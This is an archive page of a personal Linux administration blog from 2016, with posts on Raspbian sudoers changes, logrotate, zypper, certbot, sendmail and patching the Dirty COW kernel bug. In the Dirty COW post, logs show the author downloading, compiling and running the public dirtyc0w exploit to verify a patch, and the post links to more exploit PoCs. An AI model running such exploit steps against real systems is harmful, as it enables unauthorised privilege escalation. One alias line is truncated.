The Wiert Corner – irregular stream of stuff

Jeroen W. Pluimers on .NET, C#, Delphi, databases, and personal interests


Archive for the ‘Linux’ Category

Reminder to self: nosudoers changed in Raspbian…

Posted by jpluimers on 2016/10/31

So I won’t forget: trying to make sense of this incomprehensible message (and the update on a Raspberry Pi takes looooooooong and while updating, the file /etc/sudoers.d/010_pi-nopasswd does not exist yet)

20161018+1 reintroduces passwordless sudo for pi user even if previously removed · Issue #6 · RPi-Distro/raspberrypi-sys-mods [WayBack]

raspberrypi-sys-mods (20161018+3) jessie; urgency=medium

  * The 20161018 release has introduced a /etc/sudoers.d/010_pi-nopasswd file.
    - The file is installed even if the "pi ALL=(ALL) NOPASSWD: ALL" entry has been
      previously removed from /etc/sudoers by the user.
    - If you do not want the entry to exist, please comment out or remove 010_pi-nopasswd.
    - If upgrading to 20161018+3 from a version earlier than 20161018, the line in
      010_pi-nopasswd is automatically commented out if the entry doesn't exist in sudoers.
    - See https://github.com/RPi-Distro/raspberrypi-sys-mods/issues/6

 -- Serge Schneider   Wed, 19 Oct 2016 10:52:07 +0100

And after like an hour of waiting:

[master b78090b] committing changes in /etc after apt run
 6 files changed, 52 insertions(+), 29 deletions(-)
 rewrite apt/apt.conf.d/01autoremove-kernels (88%)
 create mode 100644 sudoers.d/010_pi-nopasswd
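
The changelog above means an upgrade can silently re-enable passwordless sudo, so it is worth auditing the sudoers files after each update. The following is an added example, not part of the original post or of raspberrypi-sys-mods; it runs on a constructed sample tree and relies on two documented sudoers rules (drop-in files whose names end in `~` or contain `.` are ignored, and `#` followed by digits is a uid, not a comment).

```shell
#!/bin/sh
# Added example (not from the post): list active NOPASSWD rules in sudoers files.

# $1: main sudoers file (default /etc/sudoers), $2: drop-in dir (default /etc/sudoers.d)
# Prints "file:line: rule" for every NOPASSWD rule that is not commented out.
audit_nopasswd() {
    main=${1:-/etc/sudoers}
    dropin=${2:-/etc/sudoers.d}
    for f in "$main" "$dropin"/*; do
        [ -f "$f" ] || continue
        if [ "$f" != "$main" ]; then
            # sudo ignores drop-in files whose name ends in "~" or contains "."
            case "${f##*/}" in
                *~|*.*) continue ;;
            esac
        fi
        # "#" starts a comment, except "#<digits>", which sudoers reads as a uid
        awk '
            /^[ \t]*#[^0-9]/  { next }
            /^[ \t]*#$/       { next }
            /NOPASSWD[ \t]*:/ { printf "%s:%d: %s\n", FILENAME, FNR, $0 }
        ' "$f"
    done
}

# Constructed sample tree (not real system files) mirroring the situation in the post
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir "$d/sudoers.d"
    printf 'root ALL=(ALL) ALL\n#includedir /etc/sudoers.d\n' > "$d/sudoers"
    printf 'pi ALL=(ALL) NOPASSWD: ALL\n'  > "$d/sudoers.d/010_pi-nopasswd"
    printf '#pi ALL=(ALL) NOPASSWD: ALL\n' > "$d/sudoers.d/020_commented"
    printf 'pi ALL=(ALL) NOPASSWD: ALL\n'  > "$d/sudoers.d/030_old.bak"
    echo "$d"
}

sample=$(make_sample)
audit_nopasswd "$sample/sudoers" "$sample/sudoers.d"   # only 010_pi-nopasswd is reported
rm -rf "$sample"
```

On a real system, call `audit_nopasswd` without arguments as root, since /etc/sudoers is not world-readable.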

–jeroen

Posted in *nix, Debian, Linux, Power User, Raspbian | 2 Comments »

On OpenSuSE, when adding Apache vhosts with their own log files don’t forget to update your logrotate configuration

Posted by jpluimers on 2016/10/27

Sometimes you forget one crucial step…

When adding Apache vhosts on OpenSuSE where each vhost has its own set of log files, those log files will not be logrotated by default.

So you have to edit the configuration.

I’ve done it by copying the default apache2 logrotate configuration file for each vhost like this:

/etc/logrotate.d # cp apache2 apache2.vhost.##hostname##

Here ##hostname## is the name of the vhost.

Then I edited each file and replaced the generic log file names with the specific ones for each vhost.

There are only a few vhosts on my system so the manual job wasn’t so bad, but with a great number of vhosts you’d probably want to make this a template process beyond this:

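function logrotate-add-apache2-vhost-file()
{
  # $1 is the vhost name; it ends up in a sed expression and in a file name under /etc,
  # so accept only characters that are valid in a host name
  case "$1" in
    ''|*[!A-Za-z0-9.-]*) echo "usage: logrotate-add-apache2-vhost-file vhostname" >&2; return 1 ;;
  esac
  ## http://stackoverflow.com/questions/16790793/how-to-replace-strings-containing-slashes-with-sed/16790877#16790877
  # prefix every log file name in the default configuration with "<vhost>-"
  sed -r "s#/var/log/apache2/#/var/log/apache2/$1-#g" /etc/logrotate.d/apache2 > "/etc/logrotate.d/apache2.vhost.$1"
  git add "/etc/logrotate.d/apache2.vhost.$1"
}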

This will then show in less what logrotate (which will output both to stderr and stdout, hence the 2>&1 redirect) would do on the next invocation:

logrotate -d /etc/logrotate.conf 2>&1 | less

And this is a very nice logrotate alias as well:

alias logrotate-show-status='echo "# systemctl list-timers --all" && systemctl list-timers --all && echo "# systemctl status logrotate.timer --full" && systemctl status logrotate.timer --full && echo "# journalctl -u logrotate" && journal
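
A check for the step this post warns about forgetting: list the log files that no logrotate configuration names. This is an added example, not part of the original post; it runs on a constructed sample directory, assumes log files end in `_log` (as in the sed expression above), and matches patterns with the shell's `case`, which is slightly more permissive than logrotate's own globbing.

```shell
#!/bin/sh
# Added example (not from the post): list log files that no logrotate config covers.

# Print the path patterns named in logrotate config files: words starting with "/"
# on lines outside a { ... } block (paths inside a block belong to scripts).
logrotate_patterns() {
    awk '
        depth == 0 && /^[ \t]*\// {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^\//) { p = $i; sub(/[{]$/, "", p); print p }
        }
        /[{][ \t]*$/ { depth++ }
        /^[ \t]*[}]/ { depth-- }
    ' "$@"
}

# $1: log directory; remaining arguments: logrotate config files.
# Prints every *_log file in the directory that matches none of the patterns.
uncovered_logs() {
    logdir=$1; shift
    patterns=$(logrotate_patterns "$@")
    for log in "$logdir"/*_log; do
        [ -f "$log" ] || continue
        covered=no
        set -f                      # keep the patterns unexpanded while iterating
        for p in $patterns; do
            case "$log" in $p) covered=yes ;; esac   # $p unquoted: it is a glob
        done
        set +f
        [ "$covered" = yes ] || printf '%s\n' "$log"
    done
}

# Constructed sample: a stock-style config, one vhost config, three log files
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir "$d/log" "$d/logrotate.d"
    : > "$d/log/access_log"
    : > "$d/log/www.example.org-access_log"
    : > "$d/log/shop.example.org-access_log"
    printf '%s {\n  compress\n  postrotate\n    /usr/bin/systemctl reload apache2.service\n  endscript\n}\n' \
        "$d/log/access_log" > "$d/logrotate.d/apache2"
    # same substitution as in the post, applied to the sample paths
    sed "s#$d/log/#$d/log/www.example.org-#g" "$d/logrotate.d/apache2" \
        > "$d/logrotate.d/apache2.vhost.www.example.org"
    echo "$d"
}

sample=$(make_sample)
uncovered_logs "$sample/log" "$sample"/logrotate.d/*   # reports shop.example.org-access_log
rm -rf "$sample"
```

On a real system the call would be `uncovered_logs /var/log/apache2 /etc/logrotate.d/*`.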

–jeroen

Posted in *nix, *nix-tools, Apache2, Development, Linux, logrotate, openSuSE, Power User, Scripting, Software Development, SuSE Linux, Tumbleweed | 1 Comment »

OpenSuSE Tumbleweed: after installing from ISO, be sure to disable/remove the ISO repo

Posted by jpluimers on 2016/10/26

TL;DR: OpenSuSE Tumbleweed – after installing from ISO, be sure to disable/remove the ISO repo.

A while ago I had a weird thing on my OpenSuSE Tumbleweed system while upgrading (yes, zypper dist-upgrade is the recommended way to update Tumbleweed): zypper dup complained that python3-urllib3-1.16-1.1.noarch requires python(abi) = 3.5:

# zypper dup
Warning: You are about to do a distribution upgrade with all enabled repositories. Make sure these repositories are compatible before you continue. See 'man zypper' for more information about this command.
Loading repository data...
Reading installed packages...
Computing distribution upgrade...

Problem: python3-urllib3-1.16-1.1.noarch requires python(abi) = 3.5, but this requirement cannot be provided
 Solution 1: Following actions will be done:
  deinstallation of python3-urllib3-1.15.1-2.1.noarch
  deinstallation of python3-wheel-0.29.0-2.1.noarch
  deinstallation of speedtest-cli-0.3.2-4.3.noarch
  deinstallation of python3-six-1.10.0-4.1.noarch
  deinstallation of python3-pycparser-2.14-2.1.noarch
  deinstallation of python3-pyasn1-0.1.9-2.1.noarch
  deinstallation of python3-pyOpenSSL-16.0.0-3.1.noarch
  deinstallation of python3-idna-2.1-1.1.noarch
  deinstallation of python3-chardet-2.3.0-1.4.noarch
 Solution 2: keep obsolete python-cupshelpers-1.5.7-7.2.noarch
 Solution 3: break python3-urllib3-1.16-1.1.noarch by ignoring some of its dependencies

Choose from above solutions by number or cancel [1/2/3/c] (c): 

What eventually led to the solution, with the excellent help of DimStar on the #openSUSE-factory IRC channel, was the part Solution 2: keep obsolete python-cupshelpers-1.5.7-7.2.noarch.

But first let’s look at the installed versions and repos:


Posted in *nix, Development, Internet, Linux, openSuSE, Power User, Scripting, Software Development, SpeedTest, SuSE Linux, Tumbleweed | Leave a Comment »

How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]

Posted by jpluimers on 2016/10/21

There is a nasty Linux kernel bug (Dirty COW: CVE-2016-5195) with zero-day exploits floating around.

OpenSuSE updates will be available soon (likely this weekend); from the #openSUSE-factory IRC channel:

wiert: any E.T.A. for CVE-2016-5195 in the various releases?

_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow

wiert: How about Tumbleweed?

DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday

via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]

Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.

Edit: 13.2 didn’t make it on Monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752

More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

–jeroen

Testing 13.2:

# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
# zypper patch

This works fine while awaiting the formal update process, and my testing it resulted in the release of the kernel to the official 13.2 update. Note that you still have to reboot after the update, even though the process doesn’t tell you that:

wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e
wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now.
_Marcus_: wiert: thanks :)
wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”.
_Marcus_: after your feedback i have now released the kenel ;)
wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot!
wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but I after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt


# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo
Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ……………………………………………………………………………………………………………………………………………………………………………..[done]
Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added
Enabled : Yes
Autorefresh : No
GPG Check : Yes
URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/
# zypper patch
New repository or package signing key received:
Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update)
Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org>
Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48
Key Created: Thu Aug 6 11:49:53 2015
Key Expires: Sat Oct 14 11:49:53 2017
Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1
Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t
Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ………………………………………………………………………………………………………………………………………………………………………[done]
Loading repository data…
Reading installed packages…
Resolving package dependencies…
The following NEW package is going to be installed:
kernel-default-3.16.7-45.1
The following NEW patch is going to be installed:
5752
1 new package to install.
Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used.
Continue? [y/n/? shows all options] (y): y
Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked)
Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ……………………………………………………………………………………………………………………………………………………………………………………[done (3.6 MiB/s)]
Checking for file conflicts: …………………………………………………………………………………………………………………………………………………………………………………………………………………[done]
(1/1) Installing: kernel-default-3.16.7-45.1 …………………………………………………………………………………………………………………………………………………………………………………………………..[done]
Additional rpm output:
warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut --logfile /var/log/YaST2/mkinitrd.log --force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible.
# reboot


(1/3) Installing: kernel-default-3.16.7-45.1 ……………………………………………………………………………………………….[done]
Additional rpm output:
Creating initrd: /boot/initrd-3.16.7-45-default
Executing: /usr/bin/dracut --logfile /var/log/YaST2/mkinitrd.log --force /boot/initrd-3.16.7-45-default 3.16.7-45-default
dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found!
dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found!
dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found!
*** Including module: bash ***
*** Including module: warpclock ***
*** Including module: i18n ***
*** Including module: ifcfg ***
*** Including module: btrfs ***
*** Including module: kernel-modules ***
Failed to install module sd_mod
Failed to install module unix
Failed to install module atkbd
Failed to install module i8042
Omitting driver i2o_scsi
Failed to install module swap
*** Including module: resume ***
*** Including module: rootfs-block ***
*** Including module: terminfo ***
*** Including module: udev-rules ***
Skipping udev rule: 91-permissions.rules
Skipping udev rule: 80-drivers-modprobe.rules
*** Including module: systemd ***
Failed to install module autofs4
Failed to install module ipv6
*** Including module: usrmount ***
*** Including module: base ***
*** Including module: fs-lib ***
*** Including module: shutdown ***
*** Including module: suse ***
*** Including modules done ***
*** Installing kernel module dependencies and firmware ***
*** Installing kernel module dependencies and firmware done ***
*** Resolving executable dependencies ***
*** Resolving executable dependencies done***
*** Hardlinking files ***
*** Hardlinking files done ***
*** Stripping files ***
*** Stripping files done ***
*** Generating early-microcode cpio image ***
*** Constructing GenuineIntel.bin ****
*** Store current command line parameters ***
Stored kernel commandline:
resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b
root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs
*** Creating image file ***
*** Creating image file done ***
Some kernel modules could not be included
This is not necessarily an error:
sd_mod
unix
atkbd
i8042
swap
autofs4
ipv6
Update bootloader…
(2/3) Installing: ghostscript-9.15-6.1 …………………………………………………………………………………………………….[done]
(3/3) Installing: ghostscript-x11-9.15-6.1 …………………………………………………………………………………………………[done]


$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su -
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap ffffffffffffffff
madvise -100000000
procselfmem -100000000
$ cat foo
cat: foo: No such file or directory
$ sudo su -
# cat foo
this is not a test
# logout


$ cd /tmp/
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ sudo su -
# echo this is not a test > foo
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f6ab7207000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
$ sudo su -
# reboot
login
$ cd /tmp/
$ sudo su -
# cat foo
this is not a test
# logout
$ ./dirtyc0w foo m00000000000000000
mmap 7f5465983000
madvise 0
procselfmem 1800000000
$ cat foo
this is not a test
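
The before/after sessions above show that the fixed kernel only protects the machine once it is actually running. The following added example (not part of the original post or gist) reports when the running kernel is older than the newest one installed; it assumes images are named `/boot/vmlinuz-<version>-<flavor>` as the initrd name in the log suggests, and the 3.16.7-42 release in the demo is a constructed "old" version.

```shell
#!/bin/sh
# Added example (not from the post): detect a kernel update that still needs a reboot.

# Print the newest installed release of one flavor, read from vmlinuz-<release> names.
# $1: flavor (e.g. "default"), $2: boot directory (default /boot)
newest_installed_kernel() {
    for img in "${2:-/boot}"/vmlinuz-*-"$1"; do
        [ -e "$img" ] && printf '%s\n' "${img##*/vmlinuz-}"
    done | sort -V | tail -n 1
}

# Succeeds (exit 0) when a reboot is still needed to run the newest installed kernel.
# $1: running release (default: uname -r), $2: boot directory (default /boot)
reboot_pending() {
    running=${1:-$(uname -r)}
    # compare only against kernels of the same flavor as the running one
    newest=$(newest_installed_kernel "${running##*-}" "${2:-/boot}")
    [ -n "$newest" ] && [ "$running" != "$newest" ]
}

# Human-readable summary of reboot_pending, same arguments.
kernel_status() {
    if reboot_pending "$@"; then
        echo "REBOOT NEEDED: running $running, newest installed $newest"
    else
        echo "OK: running $running"
    fi
}

# Constructed /boot with empty image files; 3.16.7-42 is a made-up older release
demo=$(mktemp -d)
: > "$demo/vmlinuz-3.16.7-42-default"
: > "$demo/vmlinuz-3.16.7-45-default"
kernel_status 3.16.7-42-default "$demo"   # state right after the update
kernel_status 3.16.7-45-default "$demo"   # state after the reboot
rm -rf "$demo"
```

Calling `kernel_status` without arguments checks the live system using `uname -r` and `/boot`.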

Posted in *nix, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

letsencrypt certbot-auto – finding what certificates are there and which apache configurations use them

Posted by jpluimers on 2016/10/13

IRC #letsencrypt-dev today:

wiert

Is there any way for `certbot-auto` to show for which domains/apache-configs it has certificates?

pdeee

wiert, we actually made a ticket for 0.10.0 to do that

https://github.com/certbot/certbot/issues/3615

in the mean time, your imperfect options are:

for file in /etc/letsencrypt/live/*/fullchain.pem ; do echo -n "$file" ; openssl x509 -text -noout -in "$file" | grep DNS; done

for installation in Apache configs, you can follow that with:

grep /etc/letsencrypt/live /etc/apache2/sites-enabled/*

wiert

@pdeee on OpenSuSE, the last statement should be

grep -r /etc/letsencrypt/live /etc/apache2/*

–jeroen

Posted in *nix, Encryption, Let's Encrypt (letsencrypt/certbot), Linux, openSuSE, Power User, Security, SuSE Linux | Leave a Comment »

Wish ttystudio was available for OpenSuSE and Mac OS X…

Posted by jpluimers on 2016/10/10

Really interesting stuff: ttystudio. It lets you record an apng or gif of a terminal session (so it should work on headless systems).

Does anyone know of alternatives for OpenSuSE and Mac OS X?

(Cockos Incorporated | LICEcap might cut it on Mac OS X, but not on headless systems so GNOME/byzanz doesn’t cut it either)

Sources:

Handy as well:

–jeroen

Posted in *nix, *nix-tools, Apple, Linux, Mac, Mac OS X / OS X / MacOS, MacBook, MacBook Retina, MacBook-Air, MacBook-Pro, MacMini, openSuSE, Power User, SuSE Linux, Tumbleweed | Leave a Comment »

Happy 25th birthday Linux!

Posted by jpluimers on 2016/10/05

Linux turns 25 today: Linux – Wikipedia, the free encyclopedia

Happy birthday!

–jeroen

Posted in *nix, Linux, Power User | Leave a Comment »

Awesome vim cheat sheet for your consideration. Download #vimcheatsheet

Posted by jpluimers on 2016/09/26

Awesome vim cheat sheet for your consideration. Download http://vimcheatsheet.com

You can either

  1. buy the poster (which is now at version 2.0),
  2. buy the digital PDF downloads (at version 2.0 too),
  3. get the free small resolution PNG downloads at 1024 x 700 or 1979 x 1346.

–jeroen

via:


Posted in *nix, *nix-tools, Linux, openSuSE, Power User, SuSE Linux | Leave a Comment »

Converting sendmail .db files to text

Posted by jpluimers on 2016/09/15

If you want to reverse the work of newaliases, you can use makemap to convert the .db files back to text:

makemap -u hash access.db

This is quite handy to see whether newaliases indeed put all information into the db file (for instance, if you use a script, you can verify it ran correctly).

It works for any db, but you need to be aware of the database format: hash type or btree type.

To my knowledge only one uses the btree type format:

  • userdb.db

All others use hash type format:

  • aliases.db
  • aliases-maillist.db
  • mailertable.db
  • genericstable.db
  • virtusertable.db
  • access.db
  • auth-info.db
  • domaintable.db

–jeroen

via: Reading Sendmail .db files.

Posted in *nix, *nix-tools, bash, Development, Linux, openSuSE, Power User, Scripting, Software Development, SuSE Linux | Leave a Comment »

Flush deferred messages in sendmail queue :: Stephan Paukner :: syslog

Posted by jpluimers on 2016/09/12

Be careful with setting the timeout of sendmail to zero when trying to flush the mail queue:

sendmail -OTimeout.hoststatus=0m -q -v

Reason: a lot of target systems apply rate limiting if you retry too often in too short a time; Gmail, for instance, does that:

421-4.7.0 [###.###.###.### 15] Our system has detected an unusual rate of
421-4.7.0 unsolicited mail originating from your IP address. To protect our
421-4.7.0 users from spam, mail sent from your IP address has been temporarily
421-4.7.0 rate limited. Please visit
421-4.7.0 https://support.google.com/mail/answer/81126 to review our Bulk Email
421 4.7.0 Senders Guidelines. w1si28749381wju.16 - gsmtp

–jeroen

via Flush deferred messages in sendmail queue :: Stephan Paukner :: syslog.

Posted in *nix, *nix-tools, Linux, openSuSE, Power User, SuSE Linux | Leave a Comment »